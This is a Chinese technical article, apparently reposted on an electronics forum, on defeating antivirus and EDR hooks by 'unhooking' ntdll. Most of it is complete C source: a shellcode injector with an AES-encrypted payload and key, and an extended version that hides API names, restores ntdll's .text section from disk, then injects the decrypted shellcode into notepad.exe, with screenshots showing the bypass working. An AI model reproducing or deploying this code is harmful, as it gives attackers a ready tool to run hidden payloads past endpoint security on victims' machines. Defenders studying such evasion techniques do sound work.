0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

杀软EDR对抗-脱钩

蛇矛实验室 来源:蛇矛实验室 2023-06-05 09:22 次阅读

1.杀软挂钩的工作原理

一般的杀毒软件会在我们进程启动的时候注入DLL到进程中,然后对系统函数进行Hook(挂钩).从而拦截我们进程的执行流程,当然这个流程只针对于未被添加到白名单的程序.我们来看下效果图.

f3fd28de-0305-11ee-90ce-dac502259ad0.png

这里我设置了白名单为apps目录,在次目录下不会被检测.

我们运行一个系统自带的软件Notepad来看下效果.

首先X64dbg附加进程

f406e1c6-0305-11ee-90ce-dac502259ad0.png

f418c5e4-0305-11ee-90ce-dac502259ad0.png

我们随便搜索一个函数看看是否被HOOK

f425c302-0305-11ee-90ce-dac502259ad0.png

f431bee6-0305-11ee-90ce-dac502259ad0.png

可以发现函数被jmp了,那么是不是我们的函数被HOOK了,如果不清楚我们在运行一个白名单里面的程序看下,或者看JMP后到那里就可以知道了,我们这里对比一下即可.

f43fa146-0305-11ee-90ce-dac502259ad0.png

对比发现为在白名单里面的程序,被挂钩了.

这里我们写一个注入程序,看看是否还能注入到进程中

#include
#include
#include
#include
#include
#include
#include
#pragmacomment (lib, "crypt32.lib")
#pragmacomment (lib, "advapi32")

unsignedcharpayload[] = { 0x23, 0xe5, 0x84, 0x36, 0xce, 0x23, 0x3b, 0xe7, 0x55, 0x66, 0x8, 0x50, 0xf3, 0x44, 0xc2, 0xe8, 0x90, 0xf0, 0x8, 0x60, 0x2c, 0x2a, 0xcc, 0x7c, 0xf1, 0x6a, 0xa5, 0x48, 0x10, 0x57, 0x10, 0x7e, 0x10, 0x24, 0x5, 0x90, 0x40, 0x14, 0x7d, 0xd3, 0xba, 0x4e, 0x7f, 0x5, 0xb7, 0x17, 0xa3, 0x4, 0x91, 0x5, 0x97, 0xd7, 0xcb, 0xa2, 0x34, 0x7c, 0x90, 0xc9, 0x4f, 0x65, 0x9d, 0x18, 0x29, 0x15, 0xd8, 0xf9, 0x1d, 0xed, 0x96, 0xc4, 0x1f, 0xee, 0x2c, 0x80, 0xc8, 0x15, 0x4b, 0x68, 0x46, 0xa0, 0xe8, 0xc0, 0xb8, 0x5f, 0x5e, 0xd5, 0x5d, 0x7d, 0xd2, 0x52, 0x9b, 0x20, 0x76, 0xe0, 0xe0, 0x52, 0x23, 0xdd, 0x1a, 0x39, 0x5b, 0x66, 0x8c, 0x26, 0x9e, 0xef, 0xf, 0xfd, 0x26, 0x32, 0x30, 0xa0, 0xf2, 0x8c, 0x2f, 0xa5, 0x9, 0x2, 0x1c, 0xfe, 0x4a, 0xe8, 0x81, 0xae, 0x27, 0xcf, 0x2, 0xaf, 0x18, 0x54, 0x3c, 0x97, 0x35, 0xfe, 0xaf, 0x79, 0x35, 0xfa, 0x99, 0x3c, 0xca, 0x18, 0x8d, 0xa1, 0xac, 0x2e, 0x1e, 0x78, 0xb6, 0x4, 0x79, 0x5e, 0xa7, 0x6d, 0x7f, 0x6e, 0xa3, 0x34, 0x8b, 0x68, 0x6d, 0x2a, 0x26, 0x49, 0x1e, 0xda, 0x5e, 0xe4, 0x77, 0x29, 0x6e, 0x15, 0x9, 0x69, 0x8b, 0x8d, 0xbd, 0x42, 0xb6, 0xd9, 0xb0, 0x90, 0xd8, 0xa1, 0xb9, 0x37, 0x80, 0x8c, 0x5d, 0xaf, 0x98, 0x11, 0xef, 0xe1, 0xcf, 0xec, 0xe7, 0xc5, 0x58, 0x73, 0xf, 0xce, 0x1e, 0x27, 0x9e, 0xc0, 0x8a, 0x36, 0xd5, 0x6b, 0x9d, 0x52, 0xe, 0x68, 0x30, 0x7c, 0x45, 0x7c, 0xb3, 0xc1, 0x3f, 0x88, 0xdc, 0x78, 0x2, 0xe6, 0xbf, 0x45, 0x2d, 0x56, 0x76, 0x15, 0xc8, 0x4c, 0xe2, 0xcd, 0xa4, 0x46, 0x38, 0x6b, 0x41, 0x2b, 0xdf, 0x24, 0x2c, 0xf1, 0x82, 0x78, 0xd1, 0xc4, 0x83, 0x7f, 0x33, 0xb5, 0x8c, 0xf7, 0xac, 0x30, 0x14, 0x0, 0x6f, 0xba, 0xf7, 0x13, 0x51, 0x6a, 0x17, 0x1c, 0xf7, 0xcd, 0x43, 0x79, 0xc2, 0x57, 0xa0, 0x9c, 0x7b, 0x12, 0xce, 0x45, 0x41, 0x4e, 0xb7, 0x6b, 0xbd, 0x22, 0xc, 0xfb, 0x88, 0x2a, 0x4c, 0x2, 0x84, 0xf4, 0xca, 0x26, 0x62, 0x48, 0x6e, 0x9b, 0x3b, 0x85, 0x22, 0xff, 0xf0, 0x4f, 0x55, 0x7b, 0xc3, 0xf4, 0x9d, 0x2d, 0xe8, 0xb6, 0x44, 0x4a, 0x23, 0x2d, 0xf9, 0xe1, 0x6, 0x1c, 0x74, 0x23, 0x6, 0xdb, 0x3c, 0x3c, 0xa6, 0xce, 0xcf, 0x38, 0xae, 0x87, 0xd1, 0x8};
unsignedcharkey[] = { 0xc0, 0xa6, 0x8b, 0x1b, 0x59, 0x92, 0xcf, 0x6b, 0xef, 0x96, 0xe7, 0xd7, 0x33, 0x65, 0xda, 0x84};

unsignedintpayload_len = sizeof(payload);

intAESDecrypt(char* payload, unsignedintpayload_len, char* key, size_tkeylen){
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;

if(!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
return-1;
}
if(!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
return-1;
}
if(!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)) {
return-1;
}
if(!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
return-1;
}

if(!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)payload, (DWORD*)&payload_len)) {
return-1;
}

CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);

return0;
}


intFindTarget(constchar* procname){

HANDLE hProcSnap;
PROCESSENTRY32 pe32;
intpid = 0;

hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(INVALID_HANDLE_VALUE == hProcSnap) return0;

pe32.dwSize = sizeof(PROCESSENTRY32);

if(!Process32First(hProcSnap, &pe32)) {
CloseHandle(hProcSnap);
return0;
}

while(Process32Next(hProcSnap, &pe32)) {
if(lstrcmpiA(procname, pe32.szExeFile) == 0) {
pid = pe32.th32ProcessID;
break;
}
}

CloseHandle(hProcSnap);

returnpid;
}

intInject(HANDLE hProc, unsignedchar* payload, unsignedintpayload_len){

LPVOID pRemoteCode = NULL;
HANDLE hThread = NULL;

AESDecrypt((char*)payload, payload_len, (char*)key, sizeof(key));

pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T*)NULL);

hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
if(hThread != NULL) {
WaitForSingleObject(hThread, 500);
CloseHandle(hThread);
return0;
}

return-1;
}


intmain(void){

intpid = 0;
HANDLE hProc = NULL;

pid = FindTarget("notepad.exe");

if(pid) {
printf("Notepad.exe PID = %d
", pid);

hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
FALSE, (DWORD)pid);

if(hProc != NULL) {
Inject(hProc, payload, payload_len);
CloseHandle(hProc);
}
}
return0;
}

首先我们先在白名单下运行一下看看.

f44cd1fe-0305-11ee-90ce-dac502259ad0.png

发现是可以直接注入的,这很正常,因为杀软不拦截我们的任何行为.

那么我们放到其他地方来运行下看看效果.

f457e7c4-0305-11ee-90ce-dac502259ad0.gif

可以发现我们的程序直接被杀掉了,注入的进程也被关闭了.

2.如何绕过EDR挂钩检测

#include
#include
#include
#include
#include
#include
#include
#pragmacomment (lib, "crypt32.lib")
#pragmacomment (lib, "advapi32")

unsignedcharpayload[] = { 0x23, 0xe5, 0x84, 0x36, 0xce, 0x23, 0x3b, 0xe7, 0x55, 0x66, 0x8, 0x50, 0xf3, 0x44, 0xc2, 0xe8, 0x90, 0xf0, 0x8, 0x60, 0x2c, 0x2a, 0xcc, 0x7c, 0xf1, 0x6a, 0xa5, 0x48, 0x10, 0x57, 0x10, 0x7e, 0x10, 0x24, 0x5, 0x90, 0x40, 0x14, 0x7d, 0xd3, 0xba, 0x4e, 0x7f, 0x5, 0xb7, 0x17, 0xa3, 0x4, 0x91, 0x5, 0x97, 0xd7, 0xcb, 0xa2, 0x34, 0x7c, 0x90, 0xc9, 0x4f, 0x65, 0x9d, 0x18, 0x29, 0x15, 0xd8, 0xf9, 0x1d, 0xed, 0x96, 0xc4, 0x1f, 0xee, 0x2c, 0x80, 0xc8, 0x15, 0x4b, 0x68, 0x46, 0xa0, 0xe8, 0xc0, 0xb8, 0x5f, 0x5e, 0xd5, 0x5d, 0x7d, 0xd2, 0x52, 0x9b, 0x20, 0x76, 0xe0, 0xe0, 0x52, 0x23, 0xdd, 0x1a, 0x39, 0x5b, 0x66, 0x8c, 0x26, 0x9e, 0xef, 0xf, 0xfd, 0x26, 0x32, 0x30, 0xa0, 0xf2, 0x8c, 0x2f, 0xa5, 0x9, 0x2, 0x1c, 0xfe, 0x4a, 0xe8, 0x81, 0xae, 0x27, 0xcf, 0x2, 0xaf, 0x18, 0x54, 0x3c, 0x97, 0x35, 0xfe, 0xaf, 0x79, 0x35, 0xfa, 0x99, 0x3c, 0xca, 0x18, 0x8d, 0xa1, 0xac, 0x2e, 0x1e, 0x78, 0xb6, 0x4, 0x79, 0x5e, 0xa7, 0x6d, 0x7f, 0x6e, 0xa3, 0x34, 0x8b, 0x68, 0x6d, 0x2a, 0x26, 0x49, 0x1e, 0xda, 0x5e, 0xe4, 0x77, 0x29, 0x6e, 0x15, 0x9, 0x69, 0x8b, 0x8d, 0xbd, 0x42, 0xb6, 0xd9, 0xb0, 0x90, 0xd8, 0xa1, 0xb9, 0x37, 0x80, 0x8c, 0x5d, 0xaf, 0x98, 0x11, 0xef, 0xe1, 0xcf, 0xec, 0xe7, 0xc5, 0x58, 0x73, 0xf, 0xce, 0x1e, 0x27, 0x9e, 0xc0, 0x8a, 0x36, 0xd5, 0x6b, 0x9d, 0x52, 0xe, 0x68, 0x30, 0x7c, 0x45, 0x7c, 0xb3, 0xc1, 0x3f, 0x88, 0xdc, 0x78, 0x2, 0xe6, 0xbf, 0x45, 0x2d, 0x56, 0x76, 0x15, 0xc8, 0x4c, 0xe2, 0xcd, 0xa4, 0x46, 0x38, 0x6b, 0x41, 0x2b, 0xdf, 0x24, 0x2c, 0xf1, 0x82, 0x78, 0xd1, 0xc4, 0x83, 0x7f, 0x33, 0xb5, 0x8c, 0xf7, 0xac, 0x30, 0x14, 0x0, 0x6f, 0xba, 0xf7, 0x13, 0x51, 0x6a, 0x17, 0x1c, 0xf7, 0xcd, 0x43, 0x79, 0xc2, 0x57, 0xa0, 0x9c, 0x7b, 0x12, 0xce, 0x45, 0x41, 0x4e, 0xb7, 0x6b, 0xbd, 0x22, 0xc, 0xfb, 0x88, 0x2a, 0x4c, 0x2, 0x84, 0xf4, 0xca, 0x26, 0x62, 0x48, 0x6e, 0x9b, 0x3b, 0x85, 0x22, 0xff, 0xf0, 0x4f, 0x55, 0x7b, 0xc3, 0xf4, 0x9d, 0x2d, 0xe8, 0xb6, 0x44, 0x4a, 0x23, 0x2d, 0xf9, 0xe1, 0x6, 0x1c, 0x74, 0x23, 0x6, 0xdb, 0x3c, 0x3c, 0xa6, 0xce, 0xcf, 0x38, 0xae, 0x87, 0xd1, 0x8};
unsignedcharkey[] = { 0xc0, 0xa6, 0x8b, 0x1b, 0x59, 0x92, 0xcf, 0x6b, 0xef, 0x96, 0xe7, 0xd7, 0x33, 0x65, 0xda, 0x84};

unsignedintpayload_len = sizeof(payload);

typedefBOOL(WINAPI * VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
typedefHANDLE(WINAPI * CreateFileMappingA_t)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCSTR);
typedefLPVOID(WINAPI * MapViewOfFile_t)(HANDLE, DWORD, DWORD, DWORD, SIZE_T);
typedefBOOL(WINAPI * UnmapViewOfFile_t)(LPCVOID);

unsignedcharsNtdll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0x0};
unsignedcharsKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0};

intAESDecrypt(char* payload, unsignedintpayload_len, char* key, size_tkeylen){
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;

if(!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
return-1;
}
if(!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
return-1;
}
if(!CryptHashData(hHash, (BYTE*) key, (DWORD) keylen, 0)){
return-1; 
}
if(!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
return-1;
}

if(!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, (BYTE *) payload, (DWORD *) &payload_len)){
return-1;
}

CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);

return0;
}


voidXORcrypt(charstr2xor[], size_tlen, charkey){
inti;

for(i = 0; i < len; i++) {
        str2xor[i] = (BYTE)str2xor[i] ^ key;
    }
}



int FindTarget(const char *procname) {

        HANDLE hProcSnap;
        PROCESSENTRY32 pe32;
        int pid = 0;
                
        hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
                
        pe32.dwSize = sizeof(PROCESSENTRY32); 
                
        if (!Process32First(hProcSnap, &pe32)) {
                CloseHandle(hProcSnap);
                return 0;
        }
                
        while (Process32Next(hProcSnap, &pe32)) {
                if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
                        pid = pe32.th32ProcessID;
                        break;
                }
        }
                
        CloseHandle(hProcSnap);
                
        return pid;
}


int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) {

  LPVOID pRemoteCode = NULL;
  HANDLE hThread = NULL;

  AESDecrypt((char *) payload, payload_len, (char *) key, sizeof(key));
  
  pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
  WriteProcessMemory(hProc, pRemoteCode, (PVOID) payload, (SIZE_T) payload_len, (SIZE_T *) NULL);
  
  hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteCode, NULL, 0, NULL);
  if (hThread != NULL) {
      WaitForSingleObject(hThread, 500);
      CloseHandle(hThread);
      return 0;
  }
  return -1;
}


static int UnhookNtdll(const HMODULE hNtdll, const LPVOID pMapping) {
  DWORD oldprotect = 0;
  PIMAGE_DOS_HEADER pImgDOSHead = (PIMAGE_DOS_HEADER) pMapping;
  PIMAGE_NT_HEADERS pImgNTHead = (PIMAGE_NT_HEADERS)((DWORD_PTR) pMapping + pImgDOSHead->e_lfanew);
inti;

unsignedcharsVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0};

VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sVirtualProtect);

for(i = 0; i < pImgNTHead->FileHeader.NumberOfSections; i++) {
PIMAGE_SECTION_HEADER pImgSectionHead = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pImgNTHead) + 
((DWORD_PTR) IMAGE_SIZEOF_SECTION_HEADER * i));

if(!strcmp((char*) pImgSectionHead->Name, ".text")) {
VirtualProtect_p((LPVOID)((DWORD_PTR) hNtdll + (DWORD_PTR) pImgSectionHead->VirtualAddress),
pImgSectionHead->Misc.VirtualSize,
PAGE_EXECUTE_READWRITE,
&oldprotect);
if(!oldprotect) {
return-1;
}
memcpy( (LPVOID)((DWORD_PTR) hNtdll + (DWORD_PTR) pImgSectionHead->VirtualAddress),
(LPVOID)((DWORD_PTR) pMapping + (DWORD_PTR) pImgSectionHead->VirtualAddress),
pImgSectionHead->Misc.VirtualSize);

VirtualProtect_p((LPVOID)((DWORD_PTR)hNtdll + (DWORD_PTR) pImgSectionHead->VirtualAddress),
pImgSectionHead->Misc.VirtualSize,
oldprotect,
&oldprotect);
if(!oldprotect) {
return-1;
}
return0;
}
}

return-1;
}




intmain(void){

intpid = 0;
HANDLE hProc = NULL;

unsignedcharsNtdllPath[] = { 0x59, 0x0, 0x66, 0x4d, 0x53, 0x54, 0x5e, 0x55, 0x4d, 0x49, 0x66, 0x49, 0x43, 0x49, 0x4e, 0x5f, 0x57, 0x9, 0x8, 0x66, 0x54, 0x4e, 0x5e, 0x56, 0x56, 0x14, 0x5e, 0x56, 0x56, 0x3a};

unsignedcharsCreateFileMappingA[] = { 'C','r','e','a','t','e','F','i','l','e','M','a','p','p','i','n','g','A', 0x0};
unsignedcharsMapViewOfFile[] = { 'M','a','p','V','i','e','w','O','f','F','i','l','e',0x0};
unsignedcharsUnmapViewOfFile[] = { 'U','n','m','a','p','V','i','e','w','O','f','F','i','l','e', 0x0};

unsignedintsNtdllPath_len = sizeof(sNtdllPath);
unsignedintsNtdll_len = sizeof(sNtdll);
intret = 0;
HANDLE hFile;
HANDLE hFileMapping;
LPVOID pMapping;

CreateFileMappingA_t CreateFileMappingA_p = (CreateFileMappingA_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sCreateFileMappingA);
MapViewOfFile_t MapViewOfFile_p = (MapViewOfFile_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sMapViewOfFile);
UnmapViewOfFile_t UnmapViewOfFile_p = (UnmapViewOfFile_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sUnmapViewOfFile);

XORcrypt((char*) sNtdllPath, sNtdllPath_len, sNtdllPath[sNtdllPath_len - 1]);
hFile = CreateFile((LPCSTR) sNtdllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
if( hFile == INVALID_HANDLE_VALUE ) {
return-1;
}

hFileMapping = CreateFileMappingA_p(hFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
if(! hFileMapping) {
CloseHandle(hFile);
return-1;
}

pMapping = MapViewOfFile_p(hFileMapping, FILE_MAP_READ, 0, 0, 0);
if(!pMapping) {
CloseHandle(hFileMapping);
CloseHandle(hFile);
return-1;
}

printf("Check 1!
"); getchar(); 

ret = UnhookNtdll(GetModuleHandle((LPCSTR) sNtdll), pMapping);

printf("Check 2!
"); getchar(); 

UnmapViewOfFile_p(pMapping);
CloseHandle(hFileMapping);
CloseHandle(hFile);

pid = FindTarget("notepad.exe");

if(pid) {
printf("Notepad.exe PID = %d
", pid);

hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
FALSE, (DWORD) pid);

if(hProc != NULL) {
Inject(hProc, payload, payload_len);
CloseHandle(hProc);
}
}
return0;
}

这段代码是加载一份新的NTDLL.DLL来恢复原本已经被破坏的NTDLL.DLL.

整个过程就是我们首先加载一份新的NTDLL.DLL保存起来,然后将原本的代码段属性置成读写可执行的,在将我们内存加载的Text段进行替换到原来的Text段,这样原本HOOK的地方就被我们替换过去了,达到了脱钩的效果,我们去看下运行效果.

f475e0d0-0305-11ee-90ce-dac502259ad0.png

我们拖进X64DBG 看下效果吧.

f47fb8bc-0305-11ee-90ce-dac502259ad0.png

目前还是被HOOK的状态,我们回车一下后x64dbg中右键分析这个函数.

f48a24b4-0305-11ee-90ce-dac502259ad0.png

发现函数已经被还原了.

3.脱钩后注入ShellCode到进程中

这样就简单的绕过了EDR的挂钩检测,部分沙箱这种技术同样可以绕过.

f4b25678-0305-11ee-90ce-dac502259ad0.gif




审核编辑:刘清

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • dll
    dll
    +关注

    关注

    0

    文章

    115

    浏览量

    45386
  • JMP
    JMP
    +关注

    关注

    1

    文章

    17

    浏览量

    12586
  • Shell
    +关注

    关注

    1

    文章

    363

    浏览量

    23311
  • EDR
    EDR
    +关注

    关注

    0

    文章

    23

    浏览量

    1985

原文标题:杀软EDR对抗-脱钩

文章出处:【微信号:蛇矛实验室,微信公众号:蛇矛实验室】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    小七免论坛vip 2013源码免培训课程

    小七免论坛vip 2013源码免培训课程目录(今日免key发布)小七免论坛vip 2013源码免培训课程解压密码:www.fanlu8.com如果www.fanlu8.com密
    发表于 10-05 17:35

    求有关电子对抗有关的matlab程序

    求大神,谁有有关电子对抗,雷达对抗,光电干扰有关的matlab程序
    发表于 06-03 10:52

    请问蓝牙2.1+edr模块和4.0+edr/BLE模块的EDR速率一样吗?

    大家好关于蓝牙问题,请教大家1、现在有蓝牙2.1+edr模块,也有蓝牙4.0+edr/BLE模块,请问这两种蓝牙的EDR速率一样吗?2、蓝牙4.0 EDR +SPP+BLE模块怎么理解
    发表于 02-21 04:43

    EDR的测试方法

    上一個章節我們已經學會了Non-Signalling mode(非信令模式)的BR測試方法,接下來我們就來看看EDR(Enhance Data Rate)的測試方法。測試架設圖如下:下表紅框框所標示
    发表于 09-20 09:05

    简述电子对抗综合模拟训练平台

    电子对抗综合模拟训练平台以电子战部队指挥机构为主要训练对象,开展集电子对抗、指挥干预、战术使用、仿真推演、训练监控与评估等功能的综合电子对抗作战训练,旨在解决现行训练保障难以满足实战化训练需求、现行训练考评难以检验实战化训练质量
    发表于 09-01 10:50

    如何解决安卓系统后台问题?

    现在的安卓系统(Android7.1),后台是不是有点狠呢,,软件界面切换到桌面,直接走destroy方法了。是否可以修改安卓系统的策略呢?
    发表于 12-30 07:33

    WAF上传绕过+wbehshell免

    WAF上传绕过+wbehshell免
    发表于 09-07 10:35 4次下载
    <b class='flag-5'>软</b>WAF上传绕过+wbehshell免<b class='flag-5'>杀</b>

    CCSA等行业协会拟与工信部脱钩

    据了解,本次被列入脱钩名单的全国性行业协会商会共有795家,其中已脱钩422家,拟脱钩373家。
    的头像 发表于 06-20 09:23 6103次阅读

    技术与技术的区别

    ,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。
    的头像 发表于 07-08 10:49 1528次阅读

    APM32F103RCT7汽车EDR应用方案

    EDR系统的硬件电路主要由4大部分组成:微控制系统、存储器电路、电源电路及传感器电路,其中微控制系统是EDR的核心部分,需要满足EDR系统在汽车复杂的工作环境中保障系统稳定运行,因而车规级MCU是微控制系统的关键所在。
    的头像 发表于 08-16 15:54 1157次阅读

    汽车的领域的EDR和DSSAD术语解析

    EDR 功能的实现方式多种多样,有的集成在气囊控制器内部,有的是由单独或多个电子部件组成。因此定义EDR 系统为由一个或多个车载电子模块构成,具有监测、采集并记录碰撞事件发生前、发生时和发生后车辆和乘员保护系统的数据功能的装置或系统。
    发表于 10-17 10:42 2616次阅读

    ASML与中国脱钩

    ASML认为脱钩是不可能的,这将极其困难且成本高昂。
    的头像 发表于 06-25 10:23 689次阅读

    什么是白加黑技术 免技术之白加黑攻击防御技术分析

    在很多的中会对白文件的操作进行放行,如果我们将黑程序和白程序在一个进程中是否就可以绕过一些的检测。
    发表于 07-24 10:37 1500次阅读
    什么是白加黑技术 免<b class='flag-5'>杀</b>技术之白加黑攻击防御技术分析

    edr系统软件有什么用 EDR系统与传统杀毒软件有什么区别

    EDR(Endpoint Detection and Response)系统软件是一种用于监测和应对网络终端设备上的安全威胁的软件。 一、EDR系统软件的作用: 实时监测和检测:EDR系统软件
    的头像 发表于 01-19 10:15 7683次阅读

    蓝牙模块所用的EDR是什么?

    数据传输呢?答案就在于蓝牙模块所采用的EDR(Extended Data Rate)技术。本文美迅物联网MesoonRF将为您详细介绍蓝牙模块所用的EDR是什么。   一、什么是EDR?  E
    的头像 发表于 05-24 14:23 456次阅读